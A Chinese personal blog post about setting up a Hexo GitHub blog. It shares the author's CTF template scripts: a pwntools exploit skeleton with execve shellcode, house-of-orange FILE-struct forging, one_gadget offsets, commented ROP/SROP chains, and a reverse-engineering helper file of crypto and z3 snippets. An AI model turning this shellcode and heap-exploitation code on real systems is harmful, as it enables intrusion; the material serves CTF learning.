感悟 January 03, 2020

第一篇github博客


搭建之路

第一次搭建自己的个人github博客,前前后后用了大概有2天的时间吧,

下载软件+建立库+修改主题+主题配置+文章的攥写

最头疼的是各种玄学问题的出现,让人很无语,找了各种资料去解决,收获了很多知识,也学到了很多东西,实践出真知,多实践真的很好!

配置推荐

关于博客的搭建,网上有一大把教程,这里就不多说了,这里分享一个大佬的基本主题配置,很受用:https://www.jianshu.com/p/3a05351a37dc

代码测试

pwn代码:

# -*- coding: utf-8 -*-
from pwn import *
#from LibcSearcher import *
from libformatstr import FormatStr
# pwntools session setup: verbose logging, tmux split for gdb, target arch,
# then either a local process or the remote service.
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
context(arch='amd64', os='linux')
# NOTE(review): this second call runs after the amd64 one, so i386 is the
# arch that stays in effect, while the remote libc path below is x86_64.
context(arch='i386', os='linux')

local = 1
elf = ELF('./pwn1')
if local:
    p, libc = process('./pwn1'), elf.libc
else:
    p, libc = remote('116.85.48.105', 5005), ELF('/lib/x86_64-linux-gnu/libc.so.6')


#obj = LibcSearcher("fgets", 0x7ff39014bd90) # 使用一个已知符号地址作为初始约束,初始化 LibcSearcher
#obj.add_condition("atoi", 218528) # 添加一个约束条件
#obj.dump("printf") # 根据已有约束条件,查询某个符号在 Libc 中的地址

#onegadget64(libc.so.6)
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
# one23 = [0x45226,0x4527a,0xf03a4,0xf1247]
# one27 = [0x4f2c5,0x4f322,0x10a38c]
# one29 = [0xe237f,0xe2383,0xe2386,0x106ef8]
# one31 = [0xe6ce3,0xe6ce6,0xe6ce9]
#onegadget32(libc.so.6)
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# fmt_payload
# py32 = fmtstr_py(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.py(start_read_offset))

# shellcode = asm(shellcraft.sh())
# Raw shellcode byte strings (the commented shellcraft line above is the pwntools equivalent).
# NOTE(review): these are Python 2 `str` literals; under Python 3 they would be text,
# not bytes, and would need a `b'...'` prefix before being sent.
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80'
shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
#shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags=0,
              _IO_read_ptr=0,
              _IO_read_end=0,
              _IO_read_base=0,
              _IO_write_base=0,
              _IO_write_ptr=0,
              _IO_write_end=0,
              _IO_buf_base=0,
              _IO_buf_end=0,
              _IO_save_base=0,
              _IO_backup_base=0,
              _IO_save_end=0,
              _IO_marker=0,
              _IO_chain=0,
              _fileno=0,
              _lock=0,
              _wide_data=0,
              _mode=0):
    """Serialise the given fields into a 0xd8-byte FILE-struct image.

    Layout produced (every unlisted byte is zero):
      0x00  p32(_flags), p32(0)
      0x08  thirteen p64 fields, _IO_read_ptr .. _IO_chain, in argument order
      0x70  p32(_fileno)
      0x88  p64(_lock)
      0xa0  p64(_wide_data)
      0xc0  p64(_mode)
    Returns the padded string (Python 2 `str`, as p32/p64 return here).
    """
    qword_fields = (_IO_read_ptr, _IO_read_end, _IO_read_base,
                    _IO_write_base, _IO_write_ptr, _IO_write_end,
                    _IO_buf_base, _IO_buf_end,
                    _IO_save_base, _IO_backup_base, _IO_save_end,
                    _IO_marker, _IO_chain)
    image = p32(_flags) + p32(0)
    for value in qword_fields:
        image += p64(value)
    image += p32(_fileno)
    # Remaining fields live at fixed offsets: pad up to each, then append it.
    for offset, value in ((0x88, _lock), (0xa0, _wide_data), (0xc0, _mode)):
        image = image.ljust(offset, "\x00") + p64(value)
    return image.ljust(0xd8, "\x00")

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    """Return a pack_file() image plus a three-qword trailer.

    Fields set in the image (everything else stays zero):
      _IO_read_ptr  = 0x61          (labelled "smallbin4file_size" in the original)
      _IO_read_base = _IO_list_all_ptr - 0x10
      _IO_write_ptr = 1
      _IO_buf_base  = binsh_addr
    The 0xd8-byte image is followed by `_IO_str_jumps_addr - 8`, an 8-byte
    zero pad, and `system_addr`.
    """
    image = pack_file(
        _flags=0,
        _IO_read_ptr=0x61,
        _IO_read_base=_IO_list_all_ptr - 0x10,
        _IO_write_base=0,
        _IO_write_ptr=1,
        _IO_buf_base=binsh_addr,
        _mode=0,
    )
    trailer = p64(_IO_str_jumps_addr - 8) + p64(0) + p64(system_addr)
    return image + trailer

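def get_io_str_jumps_offset(libc):
    """Locate the offset of `_IO_str_jumps` inside `libc`.

    The symbol is not exported, so it is found indirectly: each place where
    the packed `_IO_str_underflow` offset occurs in the library is treated as
    a candidate (presumably a table entry 0x20 bytes in), and the first
    candidate that lies past `_IO_file_jumps` is returned.

    Args:
        libc: pwntools ELF for the target libc (uses `.sym` and `.search`).

    Returns:
        int offset of `_IO_str_jumps` relative to the libc load base.

    Raises:
        ValueError: if no candidate is found. The original fell through and
            returned None, which only surfaced later as a TypeError when the
            caller added it to `libc_base`.
    """
    io_file_jumps = libc.sym['_IO_file_jumps']
    io_str_underflow = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(io_str_underflow)):
        candidate = ref_offset - 0x20
        if candidate > io_file_jumps:
            return candidate
    raise ValueError('_IO_str_jumps not found in the given libc')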

def house_of_orange_py(libc, libc_base):
    """Resolve the four libc addresses pack_file_flush_str_jumps needs and return its payload.

    `libc` is a pwntools ELF; `libc_base` is the runtime load address that
    every offset is rebased against.
    """
    str_jumps = libc_base + get_io_str_jumps_offset(libc)
    list_all = libc_base + libc.symbols['_IO_list_all']
    system_addr = libc_base + libc.symbols['system']
    binsh_addr = libc_base + next(libc.search('/bin/sh'))
    return pack_file_flush_str_jumps(str_jumps, list_all, system_addr, binsh_addr)

# Short aliases over the global tube `p`; each returns whatever the tube call returns.
def sl(s):
    return p.sendline(s)


def sd(s):
    return p.send(s)


def rc(n):
    return p.recv(n)


def ru(s):
    return p.recvuntil(s)


def ti():
    return p.interactive()


def debug(mallocr, PIE=True):
    """Attach gdb to the global tube `p` with one breakpoint.

    Args:
        mallocr: breakpoint address; an offset from the load base when PIE
            is true, an absolute address otherwise.
        PIE: whether to rebase `mallocr` using the process memory map.
    """
    if PIE:
        # `pmap <pid>` prints a header line first; the second line is taken
        # as the lowest mapping, assumed to be the binary's load base.
        mapping_lines = os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()
        breakpoint = int(mapping_lines[1], 16) + mallocr
    else:
        breakpoint = mallocr
    gdb.attach(p, 'b *{}'.format(hex(breakpoint)))

# with open('1.txt','wb+') as f:
# s = ""
# for i in shellcode:
# s += "0x" + i.encode("hex")
# for i in s:
# f.write(i)

# def mid_overflow(offset,func_got,rdi,rsi,rdx,next_func):
# py = ''
# py += 'a'*offset
# py += 'a'*8
# py += p64(pppppp_ret)
# py += p64(0)
# py += p64(0)
# py += p64(1)
# py += p64(func_got)
# py += p64(rdx)
# py += p64(rsi)
# py += p64(rdi)
# py += p64(mov_ret)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(next_func)
# return py


def add(size, content):
    """Menu option 1: allocate `size` bytes, then send `content` raw (no trailing newline)."""
    ru("> ")
    sl('1')
    # Each prompt is consumed before its answer; the size goes with a newline, the data without.
    for send, payload in ((sl, str(size)), (sd, content)):
        ru()
        send(payload)
def free(index):
    """Menu option 3: release the entry at `index`."""
    ru("> ")
    sl('3')
    ru()
    sl(str(index))
def edit(index, content):
    """Menu option 2: overwrite the entry at `index` with `content` (sent raw, no newline)."""
    ru("> ")
    sl('2')
    # Index is answered with a newline, the new data without one.
    for send, payload in ((sl, str(index)), (sd, content)):
        ru()
        send(payload)
def show(index):
    """Menu option 4: print the entry at `index`; the caller reads the output."""
    ru("> ")
    sl('4')
    ru()
    sl(str(index))




#libc_base = u64(rc(6).ljust(8,'\x00'))
#print "libc_base--->" + hex(libc_base)
#malloc_hook = libc_base + libc.sym["__malloc_hook"]
#fake_chunk = malloc_hook - 0x23
#onegadget = libc_base + one64[2]
#realloc = libc_base + libc.sym["realloc"]
#free_hook = libc_base + libc.sym["__free_hook"]
#system = libc_base + libc.sym["system"]
#binsh = libc_base + libc.search("/bin/sh").next()
#setcontext = libc_base + libc.sym["setcontext"]
#magic_gadget = libc_base + 0x00000000001547a0
#pop_rdi_ret = 0x0000000000400ea3
#pop_rdx_rsi_ret = libc_base + 0x0000000000115189
#syscall = libc_base + 0x00000000000bc3f5
#pop_rax_ret = libc_base + 0x000000000003a738
#leave_ret = libc_base + 0x0000000000400b8c

#frame = SigreturnFrame()#read(0,free_hook,0x1000) syscall
#frame.rdi = 0
#frame.rsi = bss#rdi+0x70
#frame.rdx = 0x1000#rdi+0x50
#frame.rsp = bss#ret
#frame.rip = syscall_ret#rsp->rip
#a = len(str(frame))
#print "length--->" + hex(a)
#edit(0,str(frame))


# def srop_pay():
# pay = ''
# pay += p64(0) + p64(pay_start)
# pay = pay.ljust(0x20,'\x00')
# pay += p64(setcontext+33)
# pay = pay.ljust(0x68,'\x00')
# pay += p64(0)
# pay += p64(pay_start)
# pay += p64(0)
# pay += p64(0)
# pay += p64(0x110)
# pay = pay.ljust(0xa0,'\x00')
# pay += p64(pay_start)
# pay += p64(syscall_ret)
# pay = pay.ljust(0xe0,'\x00')
# pay += p64(pay_start)
# return pay

# def orw_pay(flag_addr,addr):
# py = ''
# py += p64(pop_rdi_ret)
# py += p64(flag_addr)
# py += p64(pop_rdx_rsi_ret)
# py += p64(0)
# py += p64(0)
# py += p64(pop_rax_ret)
# py += p64(2)
# py += p64(syscall)
# py += p64(pop_rdi_ret)
# py += p64(3)
# py += p64(pop_rdx_rsi_ret)
# py += p64(0x80)
# py += p64(addr)
# py += p64(pop_rax_ret)
# py += p64(0)
# py += p64(syscall)
# py += p64(pop_rdi_ret)
# py += p64(1)
# py += p64(pop_rax_ret)
# py += p64(1)
# py += p64(syscall)
# py += "./flag\x00\x00"
# return py



# i = 0
# while 1:
# print i
# i += 1
# try:
# pwn()
# except EOFError:
# p.close()
# local = 1
# elf = ELF('./note_five')
# if local:
# p = process('./note_five')
# libc = elf.libc
# continue
# else:
# p = remote('121.40.246.48',9999)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# else:
# sl("ls")
# break
# Hand the tube over to the terminal once the scripted interaction is done.
p.interactive()

逆向(re)代码:

# -*- coding: utf-8 -*-
from Crypto.Cipher import ARC4,AES,DES
from Crypto.Util.Padding import unpad
from binascii import *
import base64
import re
import hashlib
from z3 import *
from gmpy2 import *
import libnum
from Crypto.Util.number import *
import xxtea
import sm4

# #sm4
# cipher=[0xEA,0x63,0x58,0xB7,0x8C,0xE2,0xA1,0xE9,0xC5,0x29,0x8F,0x53,0xE8,0x8,0x32,0x59,0xAF,0x1B,0x67,0xAE,0xD9,0xDA,0xCF,0xC4,0x72,0xFF,0xB1,0xEC,0x76,0x73,0xF3,0x6]
# cipher1=bytes(cipher[:16])
# cipher2=bytes(cipher[16:])
# print(len(cipher2))
# key1=sm4.SM4Key(b'Ez_5M4_C1pH@r!!!')
# print(key1.decrypt(cipher1)+key1.decrypt(cipher2))


# table1 = [
# 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
# 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
# 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
# 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/','=']
# table2 = [0x37, 0x34, 0x35, 0x32, 0x33, 0x30, 0x31, 0x3E, 0x3F, 0x3C, 0x3D, 0x3A, 0x3B, 0x38, 0x39, 0x26, 0x27, 0x24, 0x25, 0x22, 0x23, 0x20, 0x21, 0x2E, 0x2F, 0x2C, 0x17, 0x14, 0x15, 0x12, 0x13, 0x10, 0x11, 0x1E, 0x1F, 0x1C, 0x1D, 0x1A, 0x1B, 0x18, 0x19, 0x06, 0x07, 0x04, 0x05, 0x02, 0x03, 0x00, 0x01, 0x0E, 0x0F, 0x0C, 0x46, 0x47, 0x44, 0x45, 0x42, 0x43, 0x40, 0x41, 0x4E, 0x4F, 0x5D,0x59]

# def rc4_decrypt(cipher, key):
# rc4 = ARC4.new(key)
# return rc4.decrypt(cipher)
# def rc4_encrypt(cipher, key):
# rc4 = ARC4.new(key)
# return rc4.encrypt(cipher)
# def aes_decrypt_ECB(cipher, key):
# aes = AES.new(key, AES.MODE_ECB)
# return aes.decrypt(cipher)
# def aes_decrypt_CBC(cipher, key, IV):
# aes = AES.new(key, IV = IV,mode=AES.MODE_CBC)
# return aes.decrypt(cipher)
# def aes_encrypt_ECB(cipher, key):
# aes = AES.new(key, AES.MODE_ECB)
# return aes.encrypt(cipher)
# def aes_encrypt_CBC(cipher, key, IV):
# aes = AES.new(key, IV = IV,mode=AES.MODE_CBC)
# return aes.encrypt(cipher)
# def des_decrypt_ECB(cipher, key):
# des = DES.new(key, DES.MODE_ECB)
# return des.decrypt(cipher)
# def des_encrypt_ECB(cipher, key):
# des = DES.new(key, DES.MODE_ECB)
# return des.encrypt(cipher)
# def des_encrypt_CBC(cipher, key,IV):
# des = DES.new(key, IV=IV, mode=DES.MODE_CBC)
# return des.encrypt(cipher)
# def des_decrypt_CBC(cipher, key,IV):
# des = DES.new(key, IV=IV, mode=DES.MODE_CBC)
# return des.decrypt(cipher)

# #AES DES RC4
# key = b"De1CTF"
# rc4_key = key
# des_key = key.ljust(8, b"\x00")
# des_IV = b"\x01\x02\x03\x04\x05\x06\x07\x08"
# aes_key = key.ljust(16, b"\x00")
# aes_IV = b"\x01\x02\x03\x04\x05\x06\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"

# minwen = b"flag{1234567890}"

# print(rc4_encrypt(minwen,rc4_key).hex())
# cipher = "9fc730a2fa6d55afa5e2835a383e70ee"
# cipher = bytes.fromhex(cipher)
# print(rc4_decrypt(cipher,key))

# print(aes_encrypt_CBC(minwen,aes_key,aes_IV).hex())
# cipher1 = "44d39494cfc13982a4e131677d8ca5a3"
# cipher1 = bytes.fromhex(cipher1)
# print(aes_decrypt_CBC(cipher1,aes_key,aes_IV))

# print(aes_encrypt_ECB(minwen,aes_key).hex())
# cipher2 = "8cb1a49f4c7616b412a3a47318d8a32f"
# cipher2 = bytes.fromhex(cipher2)
# print(aes_decrypt_ECB(cipher2,aes_key))

# print(des_encrypt_ECB(minwen,des_key).hex())
# cipher3 = "4464cd4a107144a7f2b5ca8b6dda926b"
# cipher3 = bytes.fromhex(cipher3)
# print(des_decrypt_ECB(cipher3,des_key))

# print(des_encrypt_CBC(minwen,des_key,des_IV).hex())
# cipher4 = "3dbaf9c38dc5807595f23b8d7bcac28e"
# cipher4 = bytes.fromhex(cipher4)
# print(des_decrypt_CBC(cipher4,des_key,des_IV))



# # Base64
# c = [4, 19, 0, 19, 4, 5, 19, 93]
# code =''
# for i in c:
# code += table1[table2.index(i)]
# print(base64.b64decode(code).hex())

# bb = b"\x78\x6f\x66"
# print(bb.hex())
# a = 'aabbccddeeff'
# a_bytes = bytes.fromhex(a)
# print(a_bytes)

# # Z3
# def change1(x):
# for i in range(1,len(x)):
# for j in range(0,i//3,1):
# x[i] ^= x[j]
# return x
# f = [BitVec("x%d"%i, 8) for i in range(24)]
# fc = [BitVec("x%d"%i, 8) for i in range(24)]
# ft = change1(f)
# dt = [0xCE, 0xBC, 0x40, 0x6B, 0x7C, 0x3A, 0x95, 0xC0, 0xEF, 0x9B, 0x20, 0x20, 0x91, 0xF7, 0x02, 0x35, 0x23, 0x18, 0x02, 0xC8, 0xE7, 0x56, 0x56, 0xFA]
# s = Solver()
# for i in range(24):
# s.add(ft[i] == dt[i])
# s.check()
# m = s.model()
# ans = []
# for i in range(24):
# ans.append(m[fc[i]].as_long())
# print(ans)

# # RSA
# n = 3161262255255421133292506694323988711204792818702640666084331634444148712428915950639954540974469931426618702044672318134908678730641981414037034058320359158246813987154679178159391832232990193738454116371045928434239936027006539348488316754611586659587677659791620481200732564068367148541242426533823626586574915275209508300120574819113851895932912208783915652764568319771482309338434364094681579135086703127977870534715039005822312878739611630155714313119545610939253355808742646891815442758660278514976431521933763272615653261044607041876212998883732724662410197038419721773290601109065965674129599626151139566369
# e = 65537
# c = 631583911592660652215412683088688785438938386403323323131247534561958531288570612134139288090533619548876156447498627938626419617968918299212863936839701943643735437264304062828205809984533592547599060829451668240569384130130080928292082888526567902695707215660020201392640388518379063244487204881439591813398495285025704285781072987024698133147354238702861803146548057736756003294248791827782280722670457157385205787259979804892966529536902959813675537028879407802365439024711942091123058305460856676910458268097798532901040050506906141547909766093323197363034959926900440420805768716029052885452560625308314284406
# p = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848447
# q = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848927
# d = invert(e,(p-1)*(q-1))
# m = pow(c,d,n)
# print(long_to_bytes(m))

# # SHA256\MD5
# m = b"12345"
# c = hashlib.sha256(m).hexdigest()
# print(c)
# c = hashlib.md5(m).hexdigest()
# print(c)

# # XXTEA
# text = b"1234567890123456"
# key = b"12345670"
# key = key.ljust(16,b"\x00")
# enc = b'\x90%\xc5X\x11\x07\xf9{u]\xdf\xe5\x84\xa6eV\xeb\x10f\x83'
# decrypt_data = xxtea.decrypt(enc, key)
# print(decrypt_data)

# # 正则匹配
# s = "1234abcd"
# p = re.compile('[0-9]')
# c = p.findall(s)
# d = re.sub("[^0-9]+","",s)
# print(c,d)

大家可以自行去搭建,后期继续更新博客,主要写CTF的writeup和自己的生活感想,最后放张我喜欢的鸣人,哈哈,大家一起学习一起加油!

自娱自乐

简书已经停止更新,以后都在这里写个人博客了,向各位大佬们学习,努力提升自己的实力。

基本操作:

hexo clean   # drop the generated site and cache
hexo g       # generate the static site (hexo generate)
hexo s       # serve it locally for preview (hexo server)
hexo d       # push the generated site to the remote (hexo deploy)

这里记录下 hexo d 部署前把 SSH 密钥加入 ssh-agent 的操作:

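# Start an agent and import its environment into *this* shell. Run bare,
# `ssh-agent -s` only prints the export lines, so the following ssh-add
# cannot find the agent socket and fails.
eval "$(ssh-agent -s)"
# Load the key hexo d will use to push over SSH.
ssh-add ~/.ssh/id_rsa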